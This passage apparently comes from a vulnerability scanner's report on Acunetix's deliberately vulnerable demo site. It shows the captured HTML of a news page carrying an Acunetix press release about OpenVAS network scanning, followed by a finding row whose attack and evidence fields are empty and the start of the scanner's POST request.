pYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 466 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 Content-Length: 11097 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 11,097 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3